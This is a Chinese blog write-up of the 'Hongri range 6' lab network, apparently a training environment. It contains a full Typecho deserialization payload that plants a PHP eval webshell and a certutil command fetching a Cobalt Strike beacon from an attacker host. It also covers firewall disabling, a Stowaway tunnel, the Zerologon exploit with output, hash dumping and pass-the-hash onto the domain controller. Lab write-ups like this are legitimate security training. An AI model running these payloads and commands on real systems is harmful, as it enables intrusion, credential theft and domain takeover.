红日靶场六

因为配置网络太麻烦了,我直接让ai帮我配置好。但是还得再web服务器里重新安装typecho并配置数据库和php版本,这一部分没记录,直接开始渗透吧

dirsearch扫描

发现有install.php(不是我故意没删,是环境中本来就有的)

typecho关于install.php有两个漏洞,一个任意执行和一个反序列化

php版本是7.0.9,可以定位到是php反序列化漏洞

网上找一个payload

<?php
class Typecho_Request
{
    private $_filter = array();
    private $_params = array();

    public function __construct(){
        $this->_filter[0] = 'assert';
        $this->_params['screenName'] = 'file_put_contents("shell.php", "<?php @eval(\$_POST[cmd]); ?>")';
    }
}

class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    private $_type;
    private $_items = array();
    public function __construct(){
        $this->_type = self::RSS2;
        $this->_items[0] = array(
            'author' => new Typecho_Request(),
        );
    }
}

$final = new Typecho_Feed();
$poc = array(
    'adapter' => $final,
    'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($poc)));
?>

木马挂上去了,蚁剑连接

先用蚁剑的工具看一下,还真有MS_010

传fscan和cs

蚁剑上传文件按失败,用wegt

python -m http.sever 7777

fscan在蚁剑中的webshell中没法用,先传cs

试了很多遍才发现用不了wget…,改用 certutil

 certutil -urlcache -split -f http://192.168.111.129:7777/abc.exe file.exe

上线cs

关防火墙

netsh advfirewall set allprofiles state off

可以用MS14-058提权

提权之后发现还是无法直接psexec横向移动,先搭隧道吧

  Beacon中upload C:\Users\Kane\Desktop\可汗大点兵\Stowaway代理工具\windows_x64_agent.exe

kali中./linux_x64_admin -l 9090

跳板机Windows中 windows_x64_agent.exe -c 192.168.111.129:9090

在kali上开启sock5代理

 (admin) >> use 0

(node 0) >> socks 1080

chcp 65001切换为utf8

这里可以看见开放了 88 端口 (Kerberos) 且系统为 windows server 2012 R2 可以使用CVE-2020-1472。

Zerologon(CVE-2020-1472)的惊人危害根植于Netlogon协议一个致命的密码学实现缺陷。该协议在认证过程中使用AES-CFB8模式时,错误地允许客户端使用全零的初始化向量(IV)。这一设计使得攻击者能够伪造一个同样全零的客户端凭证,并由于加密链的反馈特性,导致校验值在特定情况下(概率高达1/256)与服务器预期匹配,从而无需任何真实凭证即可通过认证。攻击者通过数次至数百次连接尝试,便能在几分钟内成功将自己验证为域控制器本身,进而执行重置域控机器账户密码等高危操作,最终完全接管整个Active Directory域,其利用之简单与后果之严重使其成为史上最危险的Windows漏洞之一。

用msf的CVE-2020-1472模板

searchCVE-2020-1472

use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
set RHOSTS 10.10.10.10
set NBNAME DC
set Proxies socks5:127.0.0.1:1080
run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:49155 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:127.0.0.1[49155] ...
[*] 127.0.0.1:49155 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:127.0.0.1[49155] ...
[+] 127.0.0.1:49155 - Successfully authenticated
[+] 127.0.0.1:49155 - Successfully set the machine account (DC$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
[*] Auxiliary module execution completed

拿到Administrator 哈希,而且重置为了空密码

proxychains4 impacket-secretsdump -no-pass DC\$@10.10.10.10

 

用Impacket 工具 secretsdump.py 导出 Windows 系统中的密码哈希,空密码登录

proxychains4 impacket-wmiexec -hashes :dc044e0908498f7c475ae50bd70da92c administrator@10.10.10.10

 使用 NTLM 哈希进行 Pass-The-Hash 登录,然后通过 WMI 执行命令。

whoami一下是管理员,拿下域控,写黄金凭证先不做了,这套题花的时间太长了

参考博客:

https://blog.csdn.net/mooyuan/article/details/153139466

https://mp.weixin.qq.com/s/DNULlNCt56On3x-oKdYbOw

文末附加内容
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇